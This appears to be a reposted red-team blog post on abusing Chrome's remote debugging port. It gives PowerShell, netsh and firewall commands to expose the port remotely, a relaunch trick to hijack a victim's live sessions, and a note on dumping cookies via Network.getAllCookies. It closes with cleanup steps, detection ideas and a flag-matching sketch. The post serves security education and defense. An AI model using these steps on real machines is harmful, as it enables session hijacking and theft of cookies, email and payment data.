This can be useful when learning more about this API and experimenting with it.

Basics of the Chrome remote debugging feature

To start Chrome with remote debugging enabled, run:

```powershell
Start-Process "Chrome" "https://www.google.com --headless --remote-debugging-port=9222"
```

If you do not specify --headless and there is already an instance of Chrome running, then Chrome will open the new window in the existing browser and not enable the debugging port. So, either terminate all Chrome instances (using the preceding statement) or launch Chrome headless. We will discuss the differences in more detail later.
Now you can already navigate to localhost:9222, see the debugging UI, and play around with it. At this point an adversary can perform the "Cookie Crimes" attack and steal all cookies using the Network.getAllCookies() API - but let's experiment more with the UI.

Tunneling the UI to the attacker

The debugging port is only available locally for now, but malware might make it remotely accessible. In order to do that, the adversary can perform a port forward, which exposes the port remotely over the network. In Windows, this can be done by an Administrator using the netsh interface portproxy command. The following command shows how this is performed:

```powershell
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222
```

Remote connections to this port will still not be allowed, because the firewall blocks them (we forwarded to port 48333). We have to add a new firewall rule to allow port 48333. There are multiple ways to do this on Windows (we focus on Windows now, but this should also work on macOS and Linux). Use netsh to add a new firewall rule:

```powershell
netsh advfirewall firewall add rule name="Open Port 48333" dir=in action=allow protocol=TCP localport=48333
```

On modern Windows machines, this can also be done via PowerShell commands:

```powershell
New-NetFirewallRule -Name ChromeRemote -DisplayName "Open Port 48333" -Direction Inbound -Protocol tcp -LocalPort 48333 -Action Allow -Enabled True
```

Automating and remote controlling browsers as adversarial technique

Now, Mallory (our attacker) can connect from her attack machine to Alice's workstation on port 48333 and start remote controlling Chrome. The initial connection shows the currently available sessions. These are basically the tabs the victim has opened at this point (for example, after restoring the sessions, or just the home page).
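Under the hood, the UI at localhost:9222 is driven by the DevTools HTTP endpoint: GET /json returns the list of debuggable targets, each with a webSocketDebuggerUrl that a tool like Cookie Crimes connects to before issuing Network.getAllCookies. A minimal sketch of extracting those URLs from the endpoint's JSON response (the sample response below is illustrative, not captured from a real session):

```python
import json

def websocket_urls(json_text: str) -> list:
    """Extract per-target WebSocket debugger URLs from a /json response."""
    targets = json.loads(json_text)
    return [t["webSocketDebuggerUrl"] for t in targets
            if "webSocketDebuggerUrl" in t]

# Illustrative response, shaped like what http://localhost:9222/json returns:
sample = json.dumps([{
    "id": "D9CF6B093CB84FD0378C735AD056FCB7",
    "title": "Google",
    "type": "page",
    "url": "https://www.google.com/",
    "webSocketDebuggerUrl":
        "ws://localhost:9222/devtools/page/D9CF6B093CB84FD0378C735AD056FCB7",
}])
assert websocket_urls(sample) == [
    "ws://localhost:9222/devtools/page/D9CF6B093CB84FD0378C735AD056FCB7"]
```

Connecting to such a URL and sending `{"id": 1, "method": "Network.getAllCookies"}` over the WebSocket (e.g. with a third-party WebSocket client library) returns every cookie in the profile, which is exactly what Cookie Crimes automates.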
If you are trying this out yourself, you probably only see the Google home page listed (this is because, for now, we started a totally new browsing instance). Clicking the link will navigate you to that session/tab of the browser.

Spying on Chrome

When creating a headless session, we typically don't inherit the user's settings and so forth (you can look at the --user-data-dir option to learn more about this). However, there is also the --restore-last-session command-line option, which is something the Cookie Crimes author pointed out as well. The basic idea is to terminate all Chrome instances and then relaunch them with remote debugging enabled. This technique is a bit intrusive, but it is quite effective at restarting Chrome with the debug port exposed while at the same time inheriting the user's settings. To test this yourself, follow these steps:

1. First, terminate all Chrome processes (e.g. using PowerShell, assuming you are in the user's security context).
2. Afterward, launch Chrome in non-headless mode and restore the last session using the following command:

```powershell
Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
```

3. Then, connect to the remote control UI to observe the victim's browsing sessions/tabs.

As can be seen in the screenshot, there are multiple sessions opened by Alice (the victim): a Google tab, an Outlook.com tab, and a few others. By clicking any of the sessions, the attacker takes control of Alice's browser UI and can observe (as well as interfere with) what the user is doing. Even multiple attackers can connect to the port and observe the browsing session. As an example, in this demo we simulate the victim having a valid cookie for their email account; if you enter https://outlook.com in the URL of the debugging session (this is the textbox underneath the browser URL bar), the attacker will get access to the inbox. As you can see, the remote session can be used pretty much like a local one.
We can enter text, click buttons, and fully interact with websites.

Peeking at settings (credit card numbers, yikes!)

There is one last thing. Navigate to chrome://settings with the remote control. This gives access to settings, passwords (those will pop up a credential prompt for the victim), payment information, including card numbers (no popup), addresses, and many other settings. The following screenshot shows the chrome://settings URL of the victim, including sensitive information.

Important: During operations, consider performing an SSH port forward so that information goes over an encrypted channel. The examples here are for research and education. And here is a brief animation, if you are not interested in trying to play around with this yourself.

Cleaning up and reverting changes

Keep in mind that port forwarding was set up earlier to enable the remote exposure of the Chrome debugging API on port 48333. In order to remove the port forwarding and revert to the defaults, we can run the following command:

```powershell
netsh interface portproxy reset
```

Alternatively, there is a delete argument. The same applies to opening port 48333. The firewall rule can be removed again using the following command:

```powershell
netsh advfirewall firewall del rule name="Open Port 48333"
```

or, if you used the PowerShell example:

```powershell
Remove-NetFirewallRule -Name ChromeRemote
```

Finally, close all Chrome sessions by running the following command (to get your host back into a clean state):

```powershell
Get-Process chrome | Stop-Process
```

That's it - the machine should be back in a non-exposed state.

Port forwarding not really needed

The port forward is not really needed, but I thought it was cool to show how this can be done on Windows, since for some reason those "networky" things seem to be less known on Windows. Chrome also has the --remote-debugging-address option, which an adversary can set to 0.0.0.0 to listen on all interfaces. However, that only works in headless mode and requires using a custom --user-data-dir.
Detections and Mitigations

- Blue teams should look for processes launched with the --remote-debugging-port argument, and related features (--user-data-dir, ...), to identify potential misuse or malware.
- This is a post-exploitation scenario, so not having malware, adversaries, or multiple admins on your machine is good advice.
- Practicing an Assume Breach mindset and entertaining the idea that malware is already present on machines (at least on some machines in corporate environments) is always mature and solid advice (because it usually is).
- Chrome should not allow remote debugging of things like chrome://settings. Or maybe it should at least require the user's password when navigating to chrome://settings before showing sensitive information.
- The majority of users (probably 99.999%+) do not need remote debugging - maybe there could be a different solution for developers compared to regular users.

Red Team Strategies

If you liked this post and found it informative or inspirational, you might be interested in the book "Cybersecurity Attacks - Red Team Strategies". The book is filled with further ideas, research, and fundamental techniques, as well as red teaming program and people management aspects.

Hiccups and changes

Chrome changes quite frequently, so some things need updates, and then a few months later the original attacks work again. When I did this the very first time, over a year ago, there were some URL hiccups that I had to resolve, described a bit more in the book - but it's pretty straightforward to figure out. The URL that Chrome shows points to something like:

https://chrome-devtools-frontend.appspot.com/serve_file/@e7fbb071abe9328cdce4feedac9122435fbd1111/inspector.html?ws=[more stuff here]

That needs to be updated to something like this:

http://localhost:9222/devtools/inspector.html?ws=localhost:9222/devtools/page/D9CF6B093CB84FD0378C735AD056FCB7&remoteFrontend=true

When I did this last time, this wasn't necessary.
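As a starting point for the detection idea above, a small triage sketch over process command lines (the flag list is just the set discussed in this post; in practice the command lines would come from EDR or Sysmon process-creation telemetry):

```python
# Flags from this post that indicate Chrome's debugging surface is in use.
# Seeing them on an interactive user's browser process is worth a closer look.
SUSPICIOUS_FLAGS = (
    "--remote-debugging-port",
    "--remote-debugging-address",
    "--restore-last-session",   # benign alone; interesting combined with the above
    "--user-data-dir",          # common for developers, notable in combination
)

def suspicious_flags(cmdline: str) -> list:
    """Return which debugging-related flags appear in a process command line."""
    return [f for f in SUSPICIOUS_FLAGS if f in cmdline]

hits = suspicious_flags(
    "chrome.exe --remote-debugging-port=9222 --restore-last-session")
assert hits == ["--remote-debugging-port", "--restore-last-session"]
```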
Chrome's behavior changes frequently, so some of this might be different again - most recently it seems that this is at times not necessary anymore (especially if you leverage --restore-last-session).

References

- Chromium Blog - Remote Debugging with Chrome Developer
- Cookie Crimes
- MITRE ATT&CK Technique T1539: Steal Web Session Cookie
- MITRE ATT&CK Technique T1506: Web Session Cookie

Sursa: https://wunderwuzzi23.github.io/blog/posts/2020/chrome-spy-remote-control/